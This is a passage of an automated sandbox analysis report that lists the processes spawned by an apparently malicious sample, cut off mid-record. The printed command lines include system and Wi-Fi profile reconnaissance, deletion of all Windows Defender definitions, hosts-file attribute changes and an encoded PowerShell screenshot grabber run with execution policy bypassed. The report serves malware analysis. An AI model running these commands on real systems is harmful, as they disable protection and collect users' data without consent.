Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff736450000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	02:37:27
Start date:	13/12/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff6dd050000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff7a7ab0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	02:37:28
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff736be0000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff72f7f0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7384, Parent PID: 7328

General

Target ID:	67
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	02:37:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	02:37:30
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff760310000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	02:37:30
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff7d4420000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	02:37:30
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff736450000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 5768, Parent PID: 7328

General

Target ID:	75
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff736450000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff7302b0000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	02:37:31
Start date:	13/12/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff7d4420000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline"
Imagebase:	0x7ff7389d0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP"
Imagebase:	0x7ff6048f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 1420, Parent PID: 7320

General

Target ID:	85
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	02:37:32
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4244, Parent PID: 7624

General

Target ID:	87
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff736450000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff641f10000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	02:37:33
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff7bb6e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7648, Parent PID: 7896

General

Target ID:	91
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	02:37:35
Start date:	13/12/2024
Path:	C:\Windows\System32\tree.com
